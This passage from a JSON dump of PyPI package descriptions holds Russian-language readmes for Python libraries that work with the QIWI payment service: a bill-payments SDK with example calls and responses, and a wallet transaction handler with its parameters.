\u0432\u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u0438.PUBLIC_KEY='48e7qUxn9T7RyYE1MVZswX1FRSbE6iyCj2gCRwwF3Dnh5XrasNTx3BGPiMsyXQFNKQhvukniQG8RTVhYm3iPywsuk1L1SFfXsQkJYBHTMPqBjvf57v4MCz22zbCf67Lz6fdJFmn2UuziWYc2aubucguB9R7yhBvnVjdHV6tTDKNQvcPEQEAV*********'SECRET_KEY='eyJ2ZXJzaW9uIjoicmVzdF92MyIsImRhdGEiOnsibWVyY2hhbnRfaWQiOjUyNjgxMiwiYXBpX3VzZXJfaWQiOjcxNjI2MTk3LCJzZWNyZXQiOiJmZjBiZmJiM2UxYzc0MjY3YjIyZDIzOGYzMDBkNDhlYjhiNTnONPININONPN090MTg5Z**********************'qiwiApi=QiwiBillPaymentsAPI(PUBLIC_KEY,SECRET_KEY)\u0421\u043c\u0435\u043d\u0430PUBLIC_KEY\u0438SECRET_KEY\u043d\u0430 \u043d\u043e\u0432\u044b\u0439:NEW_PUBLIC_KEY='cmVzdF92MyIsImRhdGEiOnsibWVyY2hhbnRfaWQiOjUyNjgxMiwiYXBpX3VzZXJfaWQiOjcxNjI2MTk3LCJzZWNyZXQiOiJmZjBiZmJiM2UxYzc0MjY3YjIyZDIzOGYzMDBkNDhlYjhiNTk5NmIbhchhbbiNTk5NmIbhHBHIBDBI*****************'NEW_SECRET_KEY='kokoOKPzaW9uIjoicmVzdF92MyIsImRhdGEiOnsibWVyY2hhbnRfaWQiOjUyNjgxMiwiYXBpX3VzZXJfaWQiOjcxNjI2MTk3LCJzZWNyZXQiOiJmZjBiZmJiM2UxYzc0MjY3YjIyZDIzOGYzMDBkNDhlYjhiNTk5NmIbhchhbbHBHIBDBI**********************'qiwiApi.public_key=NEW_PUBLIC_KEYqiwiApi.secret_key=NEW_SECRET_KEY\u041f\u0440\u0438\u043c\u0435\u0440\u044b\u041f\u043e-\u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0441\u043f\u043e\u0441\u043e\u0431\u043e\u0432 \u043e\u043f\u043b\u0430\u0442\u044b. \u0412 \u043f\u043b\u0430\u0442\u0435\u0436\u043d\u043e\u0439 \u0444\u043e\u0440\u043c\u0435 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u044b \u0441\u0447\u0435\u0442\u0430 \u043f\u0435\u0440\u0435\u0434\u0430\u044e\u0442\u0441\u044f \u0432 \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u043c \u0432\u0438\u0434\u0435 \u0432 \u0441\u0441\u044b\u043b\u043a\u0435. \u0414\u0430\u043b\u0435\u0435 \u043a\u043b\u0438\u0435\u043d\u0442\u0443 \u043e\u0442\u043e\u0431\u0440\u0430\u0436\u0430\u0435\u0442\u0441\u044f \u0444\u043e\u0440\u043c\u0430 \u0441 \u0432\u044b\u0431\u043e\u0440\u043e\u043c \u0441\u043f\u043e\u0441\u043e\u0431\u0430 \u043e\u043f\u043b\u0430\u0442\u044b. 
\u041f\u0440\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0438 \u044d\u0442\u043e\u0433\u043e \u0441\u043f\u043e\u0441\u043e\u0431\u0430 \u043d\u0435\u043b\u044c\u0437\u044f \u0433\u0430\u0440\u0430\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c, \u0447\u0442\u043e \u0432\u0441\u0435 \u0441\u0447\u0435\u0442\u0430 \u0432\u044b\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u044b \u043c\u0435\u0440\u0447\u0430\u043d\u0442\u043e\u043c, \u0432 \u043e\u0442\u043b\u0438\u0447\u0438\u0435 \u043e\u0442 \u0432\u044b\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u043e API.\n\u0427\u0435\u0440\u0435\u0437 API \u0432\u0441\u0435 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u044b \u043f\u0435\u0440\u0435\u0434\u0430\u044e\u0442\u0441\u044f \u0432 \u0437\u0430\u043a\u0440\u044b\u0442\u043e\u043c \u0432\u0438\u0434\u0435 , \u0442\u0430\u043a \u0436\u0435 \u0432 API \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u044e\u0442\u0441\u044f \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0438 \u0432\u044b\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0438 \u043e\u0442\u043c\u0435\u043d\u044b \u0441\u0447\u0435\u0442\u043e\u0432, \u0432\u043e\u0437\u0432\u0440\u0430\u0442\u0430 \u0441\u0440\u0435\u0434\u0441\u0442\u0432 \u043f\u043e \u043e\u043f\u043b\u0430\u0447\u0435\u043d\u043d\u044b\u043c \u0441\u0447\u0435\u0442\u0430\u043c, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u0441\u0442\u0430\u0442\u0443\u0441\u0430 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0439.\u041f\u043b\u0430\u0442\u0435\u0436\u043d\u0430\u044f \u0444\u043e\u0440\u043c\u0430\u041f\u0440\u043e\u0441\u0442\u043e\u0439 \u0441\u043f\u043e\u0441\u043e\u0431 \u0434\u043b\u044f \u0438\u043d\u0442\u0435\u0433\u0440\u0430\u0446\u0438\u0438. \u041f\u0440\u0438 \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u0438 \u0444\u043e\u0440\u043c\u044b \u043a\u043b\u0438\u0435\u043d\u0442\u0443 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u044b\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0441\u0447\u0435\u0442. \u041f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u044b \u0441\u0447\u0435\u0442\u0430 \u043f\u0435\u0440\u0435\u0434\u0430\u044e\u0442\u0441\u044f \u0432 \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u043c \u0432\u0438\u0434\u0435 \u0432 \u0441\u0441\u044b\u043b\u043a\u0435. \u0414\u0430\u043b\u0435\u0435 \u043a\u043b\u0438\u0435\u043d\u0442\u0443 \u043e\u0442\u043e\u0431\u0440\u0430\u0436\u0430\u0435\u0442\u0441\u044f \u043f\u043b\u0430\u0442\u0435\u0436\u043d\u0430\u044f \u0444\u043e\u0440\u043c\u0430 \u0441 \u0432\u044b\u0431\u043e\u0440\u043e\u043c \u0441\u043f\u043e\u0441\u043e\u0431\u0430 \u043e\u043f\u043b\u0430\u0442\u044b. 
\u041f\u0440\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0438 \u044d\u0442\u043e\u0433\u043e \u0441\u043f\u043e\u0441\u043e\u0431\u0430 \u043d\u0435\u043b\u044c\u0437\u044f \u0433\u0430\u0440\u0430\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c, \u0447\u0442\u043e \u0432\u0441\u0435 \u0441\u0447\u0435\u0442\u0430 \u0432\u044b\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u044b \u043c\u0435\u0440\u0447\u0430\u043d\u0442\u043e\u043c, \u0432 \u043e\u0442\u043b\u0438\u0447\u0438\u0435 \u043e\u0442 \u0432\u044b\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u043e API.\u041c\u0435\u0442\u043e\u0434createPaymentForm\u0441\u043e\u0437\u0434\u0430\u0435\u0442 \u043f\u043b\u0430\u0442\u0435\u0436\u043d\u0443\u044e \u0444\u043e\u0440\u043c\u0443. \u0412 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0430\u0445 \u043d\u0443\u0436\u043d\u043e \u0443\u043a\u0430\u0437\u0430\u0442\u044c: \u043a\u043b\u044e\u0447 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u043f\u0440\u043e\u0432\u0430\u0439\u0434\u0435\u0440\u0430, \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u0439 \u0432 QIWI \u041a\u0430\u0441\u0441\u0435publicKey, \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 \u0441\u0447\u0435\u0442\u0430billId\u0432\u043d\u0443\u0442\u0440\u0438 \u0432\u0430\u0448\u0435\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0438 \u0441\u0443\u043c\u043c\u0443amount. \u0412 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u0431\u0443\u0434\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0430 \u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u0444\u043e\u0440\u043c\u0443 \u043e\u043f\u043b\u0430\u0442\u044b, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u043c\u043e\u0436\u043d\u043e \u043f\u0435\u0440\u0435\u0434\u0430\u0442\u044c \u043a\u043b\u0438\u0435\u043d\u0442\u0443. \u041f\u043e\u0434\u0440\u043e\u0431\u043d\u0435\u0435 \u043e \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0430\u0445 \u0432\u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u0438.params={'publicKey':qiwiApi.public_key,'amount':200,'billId':'893794793973','successUrl':'https://merchant.com/payment/success?billId=893794793973'}link=qiwiApi.createPaymentForm(params)\u0412 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435:https://oplata.qiwi.com/create?publicKey=2tbp1WQvsgQeziGY9vTLe9vDZNg7tmCymb4Lh6STQokqKrpCC6qrUUKEDZAJ7mvFnzr1yTebUiQaBLDnebLMMxL8nc6FF5zfmGQnypdXCbQJqHEJW5RJmKfj8nvgc&amount=200&billId=893794793973&successUrl=https%3A%2F%2Fmerchant.com%2Fpayment%2Fsuccess%3FbillId%3D893794793973&customFields[apiClient]=python_sdk&customFields[apiClientVersion]=3.1.2\u0412\u044b\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0441\u0447\u0435\u0442\u0430\u041d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0441\u043f\u043e\u0441\u043e\u0431 \u0434\u043b\u044f \u0438\u043d\u0442\u0435\u0433\u0440\u0430\u0446\u0438\u0438. \u041f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u044b \u043f\u0435\u0440\u0435\u0434\u0430\u044e\u0442\u0441\u044f server2server \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438. 
\u041c\u0435\u0442\u043e\u0434 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0432\u044b\u0441\u0442\u0430\u0432\u0438\u0442\u044c \u0441\u0447\u0435\u0442, \u043f\u0440\u0438 \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0438 \u0437\u0430\u043f\u0440\u043e\u0441\u0430 \u0432 \u043e\u0442\u0432\u0435\u0442\u0435 \u0432\u0435\u0440\u043d\u0435\u0442\u0441\u044f \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440payUrl- \u0441\u0441\u044b\u043b\u043a\u0430 \u0434\u043b\u044f \u0440\u0435\u0434\u0438\u0440\u0435\u043a\u0442\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u043d\u0430 \u043f\u043b\u0430\u0442\u0435\u0436\u043d\u0443\u044e \u0444\u043e\u0440\u043c\u0443.\u041c\u0435\u0442\u043e\u0434createBill\u0432\u044b\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u043d\u043e\u0432\u044b\u0439 \u0441\u0447\u0435\u0442. \u0412 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0430\u0445 \u043d\u0443\u0436\u043d\u043e \u0443\u043a\u0430\u0437\u0430\u0442\u044c: \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 \u0441\u0447\u0435\u0442\u0430billId\u0432\u043d\u0443\u0442\u0440\u0438 \u0432\u0430\u0448\u0435\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0438 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u043c\u0438 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0430\u043c\u0438fields. \u0412 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u0431\u0443\u0434\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0435\u043d \u043e\u0442\u0432\u0435\u0442 \u0441 \u0434\u0430\u043d\u043d\u044b\u043c\u0438 \u043e \u0432\u044b\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043d\u043e\u043c \u0441\u0447\u0435\u0442\u0435.billId='cc961e8d-d4d6-4f02-b737-2297e51fb48e'fields={'amount':1.00,'currency':'RUB','comment':'test','expirationDateTime':'2018-03-02T08:44:07','email':'example@mail.org','account':'client4563','successUrl':'http://test.ru/'}bill=qiwiApi.createBill(billId,fields)\u0412 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435:{\"siteId\":\"270305\",\"billId\":\"cc961e8d-d4d6-4f02-b737-2297e51fb48e\",\"amount\":{\"currency\":\"RUB\",\"value\":\"200.34\"},\"status\":{\"value\":\"WAITING\",\"changedDateTime\":\"2018-07-12T10:28:38.855+03:00\"},\"comment\":\"test\",\"creationDateTime\":\"2018-07-12T10:28:38.855+03:00\",\"expirationDateTime\":\"2018-08-26T10:28:38.855+03:00\",\"payUrl\":\"https://oplata.qiwi.com/form/?invoice_uid=bb773791-9bd9-42c1-b8fc-3358cd108422&successUrl=http%3A%2F%2Ftest.ru%2F\"}\u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e \u0441\u0447\u0435\u0442\u0435\u041c\u0435\u0442\u043e\u0434getBillInfo\u0432\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u0435\u0442 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e \u0441\u0447\u0435\u0442\u0435. \u0412 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0430\u0445 \u043d\u0443\u0436\u043d\u043e \u0443\u043a\u0430\u0437\u0430\u0442\u044c \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 \u0441\u0447\u0435\u0442\u0430billId\u0432\u043d\u0443\u0442\u0440\u0438 \u0432\u0430\u0448\u0435\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u0432 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u0431\u0443\u0434\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0435\u043d \u043e\u0442\u0432\u0435\u0442 \u0441\u043e \u0441\u0442\u0430\u0442\u0443\u0441\u043e\u043c \u0441\u0447\u0435\u0442\u0430. 
\u041f\u043e\u0434\u0440\u043e\u0431\u043d\u0435\u0435 \u0432\u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u0438.billId='cc961e8d-d4d6-4f02-b737-2297e51fb48e';billInfo=qiwiApi.getBillInfo(billId)\u041e\u0442\u0432\u0435\u0442:{\"siteId\":\"270305\",\"billId\":\"cc961e8d-d4d6-4f02-b737-2297e51fb48e\",\"amount\":{\"currency\":\"RUB\",\"value\":\"200.34\"},\"status\":{\"value\":\"WAITING\",\"changedDateTime\":\"2018-07-12T10:31:06.846+03:00\"},\"comment\":\"test\",\"creationDateTime\":\"2018-07-12T10:31:06.846+03:00\",\"expirationDateTime\":\"2018-08-26T10:31:06.846+03:00\",\"payUrl\":\"https://oplata.qiwi.com/form/?invoice_uid=ee3ad91d-cfb8-4dbf-8449-b6859fdfec3c\"}\u041e\u0442\u043c\u0435\u043d\u0430 \u043d\u0435\u043e\u043f\u043b\u0430\u0447\u0435\u043d\u043d\u043e\u0433\u043e \u0441\u0447\u0435\u0442\u0430\u041c\u0435\u0442\u043e\u0434cancelBill\u043e\u0442\u043c\u0435\u043d\u044f\u0435\u0442 \u043d\u0435\u043e\u043f\u043b\u0430\u0447\u0435\u043d\u043d\u044b\u0439 \u0441\u0447\u0435\u0442. \u0412 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0430\u0445 \u043d\u0443\u0436\u043d\u043e \u0443\u043a\u0430\u0437\u0430\u0442\u044c \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 \u0441\u0447\u0435\u0442\u0430billId\u0432\u043d\u0443\u0442\u0440\u0438 \u0432\u0430\u0448\u0435\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u0432 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u0431\u0443\u0434\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0435\u043d \u043e\u0442\u0432\u0435\u0442 \u0441 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0435\u0439 \u043e \u0441\u0447\u0435\u0442\u0435. \u041f\u043e\u0434\u0440\u043e\u0431\u043d\u0435\u0435 \u0432\u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u0438.billId='cc961e8d-d4d6-4f02-b737-2297e51fb48e'qiwiApi.cancelBill(billId)\u041e\u0442\u0432\u0435\u0442:{\"siteId\":\"270305\",\"billId\":\"cc961e8d-d4d6-4f02-b737-2297e51fb48e\",\"amount\":{\"currency\":\"RUB\",\"value\":\"200.34\"},\"status\":{\"value\":\"REJECTED\",\"changedDateTime\":\"2018-07-12T10:32:17.595+03:00\"},\"comment\":\"test\",\"creationDateTime\":\"2018-07-12T10:32:17.481+03:00\",\"expirationDateTime\":\"2018-08-26T10:32:17.481+03:00\",\"payUrl\":\"https://oplata.qiwi.com/form/?invoice_uid=cc961e8d-d4d6-4f02-b737-2297e51fb48e\"}"} +{"package": "qiwi-bills", "pacakge-description": "No description available on PyPI."} +{"package": "qiwibyadam", "pacakge-description": "No description available on PyPI."} +{"package": "qiwi-handler", "pacakge-description": "\u043f\u043e\u043b\u043d\u0430\u044f \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u044f \u0435\u0449\u0435 \u043d\u0435 \u0432\u044b\u0448\u043b\u0430, \u043d\u043e \u0435\u0441\u0442\u044c....\u042d\u0442\u0430 \u0448\u0442\u0443\u043a\u0430 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043d\u0430 \u0434\u0435\u043a\u043e\u0440\u0430\u0442\u043e\u0440\u0435, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043e\u0442\u043b\u0430\u0432\u043b\u0438\u0432\u0430\u0435\u0442 \u0442\u0440\u0430\u043d\u0437\u0430\u043a\u0446\u0438\u0438 \u043a\u043e\u0448\u0435\u043b\u044c\u043a\u0430.\n\u0414\u043b\u044f \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u0435\u0441\u0442\u044c client.run(), \u0438 await client.idle() \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0432\u0435\u043d\u043d\u043e. 
\u041e\u0431\u0430 \u043e\u043d\u0438 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0430\u0441\u0441\u0438\u043d\u0445\u0440\u043e\u043d\u043d\u044b\u043c\u0438, \u043d\u043e run()\n\u0441\u043e\u0437\u0434\u0430\u0435\u0442 \u043d\u043e\u0432\u044b\u0439 \u043b\u0443\u043f, \u0438 \u043d\u0435 \u043d\u0443\u0436\u0434\u0430\u0435\u0442\u0441\u044f \u0432 \u0437\u0430\u043f\u0443\u0441\u043a\u0435 \u0441 await\u041e\u0427\u0415\u041d\u042c \u0412\u0410\u0416\u041d\u041e!\u0412\u0440\u0435\u043c\u044f \u043d\u0430 \u043a\u043e\u043c\u044c\u044e\u0442\u0435\u0440\u0435 \u0434\u043e\u043b\u0436\u043d\u043e \u0431\u044b\u0442\u044c \u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u044b\u043c!\u0438\u043d\u0430\u0447\u0435 - \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430 \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435 \u0431\u0443\u0434\u0435\u0442 \u043b\u043e\u0432\u0438\u0442\u044c!\u043f\u0440\u0438\u043c\u0435\u0440:from client import Client\nfrom objects.account_api.types.history import History\nclient = Client(TOKEN)\n\n@client.check_pay(wallets=[PHONE NUMBER], \n amount=5, may_be_bigger=True)\ndef func(pay: History):\n print(pay)\n\nclient.run()\u0442\u0438\u043f\u044b:\u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0435 \u0442\u0438\u043f\u044b:\nHistory, UserInfo\u0438\u043c\u043f\u043e\u0440\u0442:from qiwi_handler.types import History, UserInfo\u0415\u0441\u043b\u0438 \u0432\u0430\u043c IDE \u043d\u0435 \u043f\u043e\u043c\u043e\u0433\u0430\u0435\u0442 \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u043c\u043e\u0436\u0435\u0442 \u0432\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u0442\u044c \u0444\u0443\u043d\u043a\u0446\u0438\u044f, \u0438\u043b\u0438 \u0432\u0430\u043c \u043d\u0430\u0434\u043e \u043f\u043e\u043b\u043d\u043e\u0441\u0442\u044c\u044e \u0438\u0437\u0443\u0447\u0438\u0442\u044c \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u0443\u044e:https://developer.qiwi.com/ru/qiwi-wallet-personal/index.html#restrictionsHistory (\u0418\u0441\u0442\u043e\u0440\u0438\u044f \u043f\u043b\u0430\u0442\u0435\u0436\u0435\u0439)(* - \u043e\u0431\u044f\u0437\u0430\u0442\u0435\u043b\u044c\u043d\u043e)@client.check_pay() - \u0432\u044b\u0448\u0435 \u043f\u043e\u043a\u0430\u0437\u0430\u043d\u043d\u044b\u0439 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a - \u0432\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u0435\u0442 Historywallet: str- (\u043d\u043e\u043c\u0435\u0440 \u043a\u043e\u0448\u0435\u043b\u044c\u043a\u0430(\u0442\u0435\u043b\u0435\u0444\u043e\u043d\u0430))rows: int = 5- (\u041a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0445 \u0442\u0440\u0430\u043d\u0437\u0430\u043a\u0446\u0438\u0439),operation: str = None- (\u0422\u0438\u043f \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0439 \u0432 \u043e\u0442\u0447\u0435\u0442\u0435, \u0434\u043b\u044f \u043e\u0442\u0431\u043e\u0440\u0430 (ALL, IN, OUT, QIWI_CARD)),sources: list = None- (\u0421\u043f\u0438\u0441\u043e\u043a \u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u043e\u0432 \u043f\u043b\u0430\u0442\u0435\u0436\u0430, \u0434\u043b\u044f \u0444\u0438\u043b\u044c\u0442\u0440\u0430 (QW_RUB, QW_USD, QW_EUR, CARD, MK)),start_date: str = None- \u041d\u0430\u0447\u0430\u043b\u044c\u043d\u0430\u044f \u0434\u0430\u0442\u0430 \u043f\u043e\u0438\u0441\u043a\u0430 \u043f\u043b\u0430\u0442\u0435\u0436\u0435\u0439 (DateTime URL-encoded),end_date: str = None- \u041a\u043e\u043d\u0435\u0447\u043d\u0430\u044f \u0434\u0430\u0442\u0430 \u043f\u043e\u0438\u0441\u043a\u0430 
\u043f\u043b\u0430\u0442\u0435\u0436\u0435\u0439 (DateTime URL-encoded),next_txn_date: str = None- \u0414\u0430\u0442\u0430 \u0442\u0440\u0430\u043d\u0437\u0430\u043a\u0446\u0438\u0438 \u0434\u043b\u044f \u043d\u0430\u0447\u0430\u043b\u0430 \u043e\u0442\u0447\u0435\u0442\u0430(DateTime URL-encoded),next_txn_id: int = None- \u041d\u043e\u043c\u0435\u0440 \u0442\u0440\u0430\u043d\u0437\u0430\u043a\u0446\u0438\u0438 \u0434\u043b\u044f \u043d\u0430\u0447\u0430\u043b\u0430 \u043e\u0442\u0447\u0435\u0442\u0430client.history(wallet: str) - \u0432\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u0435\u0442 array[History]message: str(\u0441\u0442\u0440\u043e\u0433\u0430\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0430 \u043d\u0430 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043d\u0438\u0435 \u043e\u043a\u043d\u0430 \"\u041a\u043e\u043c\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u0439 \u043a \u043f\u0435\u0440\u0435\u0432\u043e\u0434\u0443\"),* wallets: list(\u0441\u043f\u0438\u0441\u043e\u043a \u0438\u0437 \u043d\u043e\u043c\u0435\u0440\u043e\u0432 \u043a\u043e\u0448\u0435\u043b\u044c\u043a\u0430 (\u0442\u0435\u043b\u0435\u0444\u043e\u043d\u0430), \u0441 \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0438\u0434\u0435\u0442 \u043f\u0430\u0440\u0441\u0438\u043d\u0433),amount: float(\u0441\u0442\u0440\u043e\u0433\u0430\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0430 \u043d\u0430 \u0441\u0443\u043c\u043c\u0443, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0443\u043a\u0430\u0437\u0430\u043d\u0430 \u0432 total (\u0441 \u0443\u0447. \u043a\u043e\u043c\u0438\u0441\u0438\u0438)),may_be_bigger: bool = True(\u043f\u0440\u0435\u0432\u0440\u0430\u0449\u0430\u0435\u0442 amount \u0432 \u043d\u0435 \u0441\u0442\u0440\u043e\u0433\u0443\u044e \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0443, \u0438 \u043f\u0440\u043e\u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u0441\u0443\u043c\u043c\u044b \u0432\u044b\u0448\u0435),check_status: bool = True(\u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0430 \u043d\u0430 \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0441\u0442\u044c \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0438),operation: str = \"ALL\"(\u0422\u0438\u043f \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0439 \u0432 \u043e\u0442\u0447\u0435\u0442\u0435, \u0434\u043b\u044f \u043e\u0442\u0431\u043e\u0440\u0430 (ALL, IN, OUT, QIWI_CARD)),updates_per_minute: int = 50(\u0412\u0410\u0416\u041d\u041e! \u0431\u043e\u043b\u0448\u0435 99 \u0432 \u043c\u0438\u043d\u0443\u0442\u0443 \u0432\u0430\u043c \u043d\u0435 \u0434\u0430\u0441\u0442 \u043f\u043e\u0441\u0442\u0430\u0432\u0438\u0442\u044c \u0441\u0438\u0441\u0435\u0442\u043c\u0430, \u0442.\u043a. \u0435\u0441\u043b\u0438 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435\n\u0431\u0443\u0434\u0435\u0442 \u0431\u043e\u043b\u0435\u0435 100 - \u0432\u0430\u0448 \u0430\u043f\u0438 \u043a\u0435\u0439 \u0437\u0430\u0431\u043b\u043e\u043a\u0438\u0440\u0443\u0442 \u043d\u0430 5 \u043c\u0438\u043d\u0443\u0442. 
\u0415\u0441\u043b\u0438 \u0432\u0430\u043c \u043d\u0435 \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0441\u043a\u043e\u0440\u043e\u0441\u0442\u0438 - \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0439\u0442\u0435 \u0431\u043e\u043b\u044c\u0448\u043e\u0435 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435\n\u0432 rows_per_update),rows_per_update: int = 5(\u041a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0445 \u0442\u0440\u0430\u043d\u0437\u0430\u043a\u0446\u0438\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u0435\u0440\u0435\u0434\u0430\u044e\u0442\u0441\u044f \u043d\u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0443 \u0445\u0435\u043d\u0434\u043b\u0435\u0440\u0443,\n\u0431\u043e\u043b\u044c\u0448\u0435 50 \u043f\u043e\u0441\u0442\u0430\u0432\u0438\u0442\u044c \u043d\u0435 \u0432\u044b\u0439\u0434\u0435\u0442)UserInfo (\u041f\u0440\u043e\u0444\u0438\u043b\u044c 